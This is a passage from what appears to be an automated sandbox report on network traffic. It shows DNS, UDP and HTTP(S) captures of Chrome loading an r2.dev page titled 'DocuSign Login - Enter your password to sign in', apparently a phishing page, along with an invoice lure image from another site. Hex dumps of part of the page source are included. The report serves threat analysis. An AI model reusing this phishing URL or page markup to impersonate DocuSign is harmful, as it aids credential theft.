                      Jan 15, 2025 01:43:12.027152061 CET54398443192.168.2.4142.250.181.228
                      Jan 15, 2025 01:43:12.027194023 CET44354398142.250.181.228192.168.2.4

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 15, 2025 01:41:57.041404009 CET53647361.1.1.1192.168.2.4
                      Jan 15, 2025 01:41:57.322227001 CET53547351.1.1.1192.168.2.4
                      Jan 15, 2025 01:41:58.313842058 CET53598481.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:00.480058908 CET5244153192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:00.480315924 CET5989253192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:00.487339020 CET53598921.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:00.487469912 CET53524411.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:02.359812021 CET53606581.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:02.627939939 CET6272453192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:02.628103971 CET5152953192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:02.636398077 CET53627241.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:02.637545109 CET53515291.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:03.101820946 CET5714853192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:03.102006912 CET5510853192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:03.110838890 CET53551081.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:03.110872030 CET53571481.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:04.186604977 CET6107653192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:04.186768055 CET5340253192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:04.194597960 CET53587951.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:04.299005985 CET53534021.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:04.404825926 CET53610761.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:05.373783112 CET53526121.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:05.386485100 CET53642491.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:05.406856060 CET5111853192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:05.407080889 CET5542253192.168.2.41.1.1.1
                      Jan 15, 2025 01:42:05.521068096 CET53554221.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:05.622531891 CET53511181.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:14.983283043 CET138138192.168.2.4192.168.2.255
                      Jan 15, 2025 01:42:39.239077091 CET53569281.1.1.1192.168.2.4
                      Jan 15, 2025 01:42:56.318525076 CET53643081.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jan 15, 2025 01:42:00.480058908 CET192.168.2.41.1.1.10x102Standard query (0)www.google.comA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:00.480315924 CET192.168.2.41.1.1.10x8eaeStandard query (0)www.google.com65IN (0x0001)false
                      Jan 15, 2025 01:42:02.627939939 CET192.168.2.41.1.1.10xc22dStandard query (0)pub-3b43df3d08c6428eb75adaf661b4216f.r2.devA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:02.628103971 CET192.168.2.41.1.1.10xd334Standard query (0)pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev65IN (0x0001)false
                      Jan 15, 2025 01:42:03.101820946 CET192.168.2.41.1.1.10x340bStandard query (0)pub-3b43df3d08c6428eb75adaf661b4216f.r2.devA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:03.102006912 CET192.168.2.41.1.1.10xa33aStandard query (0)pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev65IN (0x0001)false
                      Jan 15, 2025 01:42:04.186604977 CET192.168.2.41.1.1.10x638dStandard query (0)www.continentalsports.co.ukA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:04.186768055 CET192.168.2.41.1.1.10x39e7Standard query (0)www.continentalsports.co.uk65IN (0x0001)false
                      Jan 15, 2025 01:42:05.406856060 CET192.168.2.41.1.1.10xefd2Standard query (0)www.continentalsports.co.ukA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:05.407080889 CET192.168.2.41.1.1.10xc8Standard query (0)www.continentalsports.co.uk65IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jan 15, 2025 01:42:00.487339020 CET1.1.1.1192.168.2.40x8eaeNo error (0)www.google.com65IN (0x0001)false
                      Jan 15, 2025 01:42:00.487469912 CET1.1.1.1192.168.2.40x102No error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:02.636398077 CET1.1.1.1192.168.2.40xc22dNo error (0)pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:02.636398077 CET1.1.1.1192.168.2.40xc22dNo error (0)pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:03.110872030 CET1.1.1.1192.168.2.40x340bNo error (0)pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:03.110872030 CET1.1.1.1192.168.2.40x340bNo error (0)pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:04.404825926 CET1.1.1.1192.168.2.40x638dNo error (0)www.continentalsports.co.uk95.154.228.177A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:42:05.622531891 CET1.1.1.1192.168.2.40xefd2No error (0)www.continentalsports.co.uk95.154.228.177A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
                      • www.continentalsports.co.uk

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.454324172.66.0.235801848C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      Jan 15, 2025 01:42:02.643342972 CET478OUTGET /docu/e_protocol.html HTTP/1.1
                      Host: pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Encoding: gzip, deflate
                      Accept-Language: en-US,en;q=0.9
                      Jan 15, 2025 01:42:03.099009037 CET534INHTTP/1.1 301 Moved Permanently
                      Date: Wed, 15 Jan 2025 00:42:03 GMT
                      Content-Type: text/html
                      Content-Length: 167
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Wed, 15 Jan 2025 01:42:03 GMT
                      Location: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html
                      Vary: Accept-Encoding
                      Server: cloudflare
                      CF-RAY: 9021d2d90e66de92-EWR
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                      Jan 15, 2025 01:42:48.103246927 CET6OUTData Raw: 00
                      Data Ascii:


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.454327172.66.0.2354431848C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:42:03 UTC706OUTGET /docu/e_protocol.html HTTP/1.1
                      Host: pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:42:03 UTC284INHTTP/1.1 200 OK
                      Date: Wed, 15 Jan 2025 00:42:03 GMT
                      Content-Type: text/html
                      Content-Length: 252205
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "ac9dbd4fd1fb0add29a1b8703bce9406"
                      Last-Modified: Thu, 09 Jan 2025 07:33:11 GMT
                      Server: cloudflare
                      CF-RAY: 9021d2dcda537d0c-EWR
                      2025-01-15 00:42:03 UTC1085INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 20 63 6c 61 73 73 3d 61 63 63 6f 75 6e 74 2d 73 65 72 76 65 72 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 44 6f 63 75 53 69 67 6e 20 4c 6f 67 69 6e 20 2d 20 45 6e 74 65 72 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 20 74 6f 20 73 69 67 6e 20 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 73 74 79 6c 65 20 64 61 74 61 2d 65 6d 6f 74 69 6f 6e 3d 63 73 73 20 64 61 74 61 2d 73 69 6e 67 6c 65 2d 66 69 6c 65 7a 2d 73 74 79 6c 65 73 68 65 65 74 3d 31 36 3e 2e 61 63 63 6f 75 6e 74 2d 73 65 72 76
                      Data Ascii: <!DOCTYPE html> <html lang=en class=account-server><meta charset=utf-8><meta name=viewport content="initial-scale=1.0"><title>DocuSign Login - Enter your password to sign in</title><style data-emotion=css data-single-filez-stylesheet=16>.account-serv
                      2025-01-15 00:42:03 UTC1369INData Raw: 69 6e 6b 2d 62 6f 64 79 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 2e 69 6e 6b 2d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 7d 2e 69 6e 6b 2d 70 61 67 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 69 6e 6b 2d 66 6f 72 6d 2d 75 6e 69 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 7d 2e 69 6e 6b 2d 66 6f 72 6d 2d 75 6e 69 74 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 72 65 6d 7d 2e 69 6e 6b 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                      Data Ascii: ink-body{justify-content:center}}@media (min-width:600px){.ink-body{display:flex;flex-direction:column;align-items:center}}.ink-page-title{margin-bottom:1rem}.ink-form-unit{margin-top:1.5rem}.ink-form-unit:first-child{margin-top:2rem}.ink-secondary-button
                      2025-01-15 00:42:03 UTC1369INData Raw: 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2a 2c 3a 3a 61 66 74 65 72 2c 3a 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 44 53 49 6e 64 69 67 6f 22 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 75 72 6c 28 64 61 74 61 3a 66 6f 6e 74 2f 77 6f 66 66 32 3b 62 61 73 65 36 34 2c 64 30 39 47 4d 67 41 42 41 41 41 41 41 48 4e 4d 41 42 49 41 41 41 41 42 59 73 77 41 41 48 4c 6b 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                      Data Ascii: t-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}*,::after,::before{box-sizing:inherit}@font-face{font-family:"DSIndigo";font-style:normal;font-weight:400;src:url(data:font/woff2;base64,d09GMgABAAAAAHNMABIAAAABYswAAHLkAAEAAAAAAAAAAAAAAAAAAAAAAAAA
                      2025-01-15 00:42:03 UTC1369INData Raw: 39 37 64 2f 4f 2f 52 6b 6a 39 6e 79 59 4f 36 43 48 78 45 54 38 30 77 58 48 74 48 74 63 78 64 31 6e 72 41 54 65 72 6c 46 4a 4b 4b 54 71 6e 6a 32 48 5a 76 67 75 4b 46 44 7a 56 42 53 72 61 33 55 65 6b 54 61 4a 74 2b 76 64 72 67 62 59 57 78 52 51 4b 48 53 4a 57 61 48 48 36 74 58 68 7a 61 77 2f 31 6a 6b 31 38 2f 61 50 6e 62 36 43 55 5a 42 53 30 30 66 79 75 64 35 54 66 6e 75 2f 35 6e 6f 39 47 6f 79 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 67 36 4f 6a 72 61 72 77 48 34 39 65 32 37 77 62 6c 48 55 78 52 46 30 52 52 4e 36 2f 44 41 4c 64 6f 6c 47 6b 56 52 4e 49 6f 75 43 37 53 7a 2f 4d 4a 5a 71 41 55 45 4b 48 4d 79 7a 75 79 45 64 6c 63 2b 61 5a 75 41 41 67 41 2f 31 64 53 76 61 35 58 6b 2f 6d 6b 46 5a 71 78 6b 50 69 52 2f 41 50 6a 73 41
                      Data Ascii: 97d/O/Rkj9nyYO6CHxET80wXHtHtcxd1nrATerlFJKKTqnj2HZvguKFDzVBSra3UekTaJt+vdrgbYWxRQKHSJWaHH6tXhzaw/1jk18/aPnb6CUZBS00fyud5Tfnu/5no9GoyiKoiiKoiiKoiiKoiiKoiiKoig6OjrarwH49e27wblHUxRF0RRN6/DALdolGkVRNIouC7Sz/MJZqAUEKHMyzuyEdlc+aZuAAgA/1dSva5Xk/mkFZqxkPiR/APjsA
                      2025-01-15 00:42:03 UTC1369INData Raw: 56 37 62 7a 51 6d 4e 31 7a 30 46 42 73 49 4f 5a 4b 32 45 45 62 53 6a 62 52 6c 45 38 4f 71 57 65 62 63 6f 57 77 6b 6f 43 6e 6e 54 6c 4f 4f 35 2b 68 50 47 6a 6b 64 33 69 34 71 79 49 56 73 53 69 76 6f 63 4d 41 37 6c 2b 41 66 6c 5a 35 37 70 68 6a 2f 39 76 69 37 7a 2b 79 63 75 78 7a 39 2f 32 37 49 64 6d 4f 33 74 4f 38 58 6f 37 58 6d 50 36 45 69 4d 6b 70 44 5a 32 55 5a 79 57 6b 6c 4a 43 52 77 73 39 4d 44 7a 33 68 65 7a 47 6a 78 6e 37 74 37 45 56 69 50 38 77 68 68 45 4e 78 68 78 32 50 4d 6c 57 58 79 44 7a 70 4c 46 34 7a 37 38 75 58 7a 49 70 61 57 47 74 6d 6f 2b 58 4b 6e 74 66 45 69 2f 4d 6c 63 79 5a 59 4c 72 2f 77 77 6d 4f 49 4e 2b 68 51 46 70 30 49 76 6b 54 2f 71 2b 4b 43 6f 6c 4c 7a 51 36 41 76 4d 63 50 77 31 43 43 55 70 49 77 68 6b 49 78 54 38 34 4c 6b 78 69
                      Data Ascii: V7bzQmN1z0FBsIOZK2EEbSjbRlE8OqWebcoWwkoCnnTlOO5+hPGjkd3i4qyIVsSivocMA7l+AflZ57phj/9vi7z+ycuxz9/27IdmO3tO8Xo7XmP6EiMkpDZ2UZyWklJCRws9MDz3hezGjxn7t7EViP8whhENxhx2PMlWXyDzpLF4z78uXzIpaWGtmo+XKntfEi/MlcyZYLr/wwmOIN+hQFp0IvkT/q+KColLzQ6AvMcPw1CCUpIwhkIxT84Lkxi
                      2025-01-15 00:42:03 UTC1369INData Raw: 64 59 66 4f 4d 43 65 75 50 54 46 49 72 54 6f 6f 75 6d 68 36 44 42 67 79 4e 70 4f 4a 57 55 79 5a 64 30 73 30 75 2b 70 43 57 72 7a 68 52 31 52 54 55 46 4b 6c 53 5a 63 68 6b 30 53 57 6e 46 53 38 31 30 71 55 71 76 6c 32 4a 54 71 4a 62 58 54 5a 69 34 4d 4f 4f 65 4b 59 55 38 34 34 6c 77 76 6b 34 74 32 6c 58 4a 36 75 75 4f 71 61 36 32 37 6c 44 75 37 6c 41 56 35 34 35 63 32 64 4c 32 6a 66 64 46 33 63 77 43 34 65 6f 6b 50 77 50 53 55 6d 61 54 47 6b 7a 34 6e 45 35 6f 36 4d 65 52 30 4d 41 5a 49 75 6f 61 45 58 66 63 2b 41 49 65 50 4d 68 49 6c 5a 6a 57 56 4d 49 32 61 54 65 62 56 41 73 34 78 56 73 6d 62 54 62 56 48 73 69 50 32 46 73 48 72 69 38 59 37 76 4b 37 2b 49 53 4c 4b 54 49 72 57 6d 59 61 54 4c 6b 45 6b 69 53 30 35 79 49 33 6b 71 58 34 46 43 78 53 6c 42 71 54 4c
                      Data Ascii: dYfOMCeuPTFIrTooumh6DBgyNpOJWUyZd0s0u+pCWrzhR1RTUFKlSZchk0SWnFS810qUqvl2JTqJbXTZi4MOOeKYU844lwvk4t2lXJ6uuOqa627lDu7lAV545c2dL2jfdF3cwC4eokPwPSUmaTGkz4nE5o6MeR0MAZIuoaEXfc+AIePMhIlZjWVMI2aTebVAs4xVsmbTbVHsiP2FsHri8Y7vK7+ISLKTIrWmYaTLkEkiS05yI3kqX4FCxSlBqTL
                      2025-01-15 00:42:03 UTC1369INData Raw: 37 4b 4a 48 53 75 77 42 4b 41 4c 5a 6d 58 42 2b 61 34 57 6c 63 36 55 78 6f 6b 67 4c 68 67 56 70 48 52 46 30 71 34 35 77 59 72 4f 68 69 43 47 71 6a 52 67 72 73 61 30 56 68 43 36 30 7a 51 6e 4c 6e 73 79 57 73 67 77 65 31 7a 58 31 4e 74 41 31 37 7a 34 67 6a 33 4d 59 30 33 38 56 6c 74 36 44 69 2f 50 4d 49 51 49 6c 67 4c 67 6b 34 73 54 65 44 74 51 46 57 32 79 64 67 67 65 4b 58 58 59 41 52 2b 55 41 63 32 57 65 63 37 76 56 70 6b 46 51 77 64 48 46 75 67 46 54 4a 51 6b 58 4e 55 45 70 61 62 5a 34 6b 2b 6e 36 74 36 2b 6c 41 35 54 6c 75 2f 4f 33 77 45 69 67 64 64 70 58 6c 65 31 67 66 59 55 37 41 4d 55 67 6b 6c 6b 42 6f 65 56 71 45 65 59 6b 6a 34 64 44 4f 61 67 68 75 62 31 7a 51 57 76 46 34 48 53 63 6e 33 78 52 74 64 55 6b 4e 4d 74 55 76 70 39 42 67 54 44 63 49 6c 73
                      Data Ascii: 7KJHSuwBKALZmXB+a4Wlc6UxokgLhgVpHRF0q45wYrOhiCGqjRgrsa0VhC60zQnLnsyWsgwe1zX1NtA17z4gj3MY038Vlt6Di/PMIQIlgLgk4sTeDtQFW2ydggeKXXYAR+UAc2Wec7vVpkFQwdHFugFTJQkXNUEpabZ4k+n6t6+lA5Tlu/O3wEigddpXle1gfYU7AMUgklkBoeVqEeYkj4dDOaghub1zQWvF4HScn3xRtdUkNMtUvp9BgTDcIls
                      2025-01-15 00:42:03 UTC1369INData Raw: 64 37 43 30 46 65 59 65 6c 4b 7a 44 44 5a 54 42 30 36 2f 45 55 48 6f 42 31 50 6a 6c 7a 44 2f 61 70 79 73 74 53 57 67 6c 7a 6d 32 76 61 49 73 63 61 35 6c 48 31 33 71 42 39 67 42 62 68 6b 43 48 56 63 65 53 6a 59 30 31 52 2f 65 4d 36 74 6a 72 58 6b 36 54 70 6e 63 61 77 43 75 34 46 49 31 49 71 36 6e 64 47 75 59 74 32 71 33 34 74 46 55 74 61 77 4d 57 72 54 49 72 4c 4a 45 4d 6f 46 65 5a 41 36 73 76 2b 4e 79 70 35 59 54 79 6e 78 68 45 44 73 33 54 37 35 47 7a 6d 55 69 33 5a 6c 53 37 4b 79 51 35 68 54 30 55 2b 57 6c 48 6b 69 6d 43 2b 75 48 7a 62 41 4e 6b 67 30 52 44 55 73 61 6f 54 50 5a 42 6f 56 4e 51 2b 52 6e 35 57 48 31 69 71 72 65 59 31 32 48 56 75 48 59 4c 33 45 42 71 6d 4e 4d 70 73 45 6d 7a 56 73 6b 64 75 71 73 45 33 44 64 71 57 54 75 39 6f 70 7a 68 53 63 52
                      Data Ascii: d7C0FeYelKzDDZTB06/EUHoB1PjlzD/apystSWglzm2vaIsca5lH13qB9gBbhkCHVceSjY01R/eM6tjrXk6TpncawCu4FI1Iq6ndGuYt2q34tFUtawMWrTIrLJEMoFeZA6sv+Nyp5YTynxhEDs3T75GzmUi3ZlS7KyQ5hT0U+WlHkimC+uHzbANkg0RDUsaoTPZBoVNQ+Rn5WH1iqreY12HVuHYL3EBqmNMpsEmzVskduqsE3DdqWTu9opzhScR
                      2025-01-15 00:42:03 UTC1369INData Raw: 48 35 31 48 2f 4f 6b 4c 31 73 46 33 47 68 69 57 37 6c 55 55 71 64 4e 42 66 53 61 53 43 7a 4f 6c 64 72 55 6c 2f 49 35 6c 36 75 36 59 30 43 61 4e 63 65 32 72 70 77 4e 54 77 57 64 35 39 4f 77 33 69 74 38 6d 34 55 67 4e 51 4e 4d 63 41 75 4b 71 54 4b 53 46 4b 55 78 53 70 76 44 59 43 4b 70 70 6a 41 42 71 74 35 4a 70 64 51 58 6f 6e 44 38 73 51 61 6b 6f 73 79 57 73 54 55 6d 32 54 41 50 52 67 5a 41 71 38 76 70 33 76 46 46 72 48 58 54 45 54 77 70 6b 56 4f 6a 56 6c 5a 66 4c 54 41 66 7a 39 68 61 4d 70 69 7a 57 32 2b 56 2f 67 54 64 5a 34 53 51 54 66 30 61 68 39 6f 4a 75 65 68 39 7a 56 76 56 47 5a 37 53 34 4f 44 30 79 2f 6f 30 54 76 71 30 56 63 47 4f 76 72 4c 72 32 55 6e 34 70 4b 4c 75 2f 59 58 38 32 66 54 55 70 4e 48 6b 38 69 42 45 6d 4a 36 42 67 52 30 2b 52 4c 53 4c
                      Data Ascii: H51H/OkL1sF3GhiW7lUUqdNBfSaSCzOldrUl/I5l6u6Y0CaNce2rpwNTwWd59Ow3it8m4UgNQNMcAuKqTKSFKUxSpvDYCKppjABqt5JpdQXonD8sQakosyWsTUm2TAPRgZAq8vp3vFFrHXTETwpkVOjVlZfLTAfz9haMpizW2+V/gTdZ4SQTf0ah9oJueh9zVvVGZ7S4OD0y/o0Tvq0VcGOvrLr2Un4pKLu/YX82fTUpNHk8iBEmJ6BgR0+RLSL
                      2025-01-15 00:42:03 UTC1369INData Raw: 50 64 6a 61 6e 78 68 64 63 72 48 67 6a 79 75 30 4c 47 31 6d 2f 4e 66 4e 31 4d 30 50 45 2b 34 66 44 78 4c 56 36 52 38 67 6c 77 4e 64 61 71 6c 47 59 35 74 34 5a 6b 38 76 33 63 76 6a 76 64 73 2f 36 31 65 42 51 7a 38 61 47 65 37 30 4e 56 39 4e 68 53 62 55 79 47 65 66 52 35 4b 50 75 67 58 76 75 59 62 65 69 74 37 5a 7a 57 52 6c 65 37 48 52 38 76 70 48 36 71 38 4c 64 36 79 6d 50 53 45 4c 33 33 48 69 2b 46 75 54 51 6d 47 68 6b 58 58 5a 75 74 5a 72 47 7a 74 37 36 41 37 59 61 42 51 47 6f 53 63 32 7a 71 55 31 6f 6b 4c 4b 77 61 50 74 45 53 32 61 59 31 66 30 46 74 68 6f 4a 4b 6d 2f 74 57 34 44 7a 77 64 70 7a 4c 53 43 38 6d 47 68 30 59 4a 77 58 65 52 38 69 39 67 39 53 38 6d 64 76 71 38 2f 41 58 31 6c 4c 71 69 76 4d 5a 6e 75 7a 45 38 6d 6d 4f 74 47 6e 62 6d 44 2f 32 5a
                      Data Ascii: PdjanxhdcrHgjyu0LG1m/NfN1M0PE+4fDxLV6R8glwNdaqlGY5t4Zk8v3cvjvds/61eBQz8aGe70NV9NhSbUyGefR5KPugXvuYbeit7ZzWRle7HR8vpH6q8Ld6ymPSEL33Hi+FuTQmGhkXXZutZrGzt76A7YaBQGoSc2zqU1okLKwaPtES2aY1f0FthoJKm/tW4DzwdpzLSC8mGh0YJwXeR8i9g9S8mdvq8/AX1lLqivMZnuzE8mmOtGnbmD/2Z


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.45433095.154.228.1774431848C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:42:05 UTC635OUTGET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:42:05 UTC370INHTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:42:05 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:42:05 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes
                      2025-01-15 00:42:05 UTC7494INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 38 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c2 00 11 08 01 09 01 09 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 02 03 01 01 00 00 00 00 00 00
                      Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.45433595.154.228.1774431848C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:42:06 UTC435OUTGET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
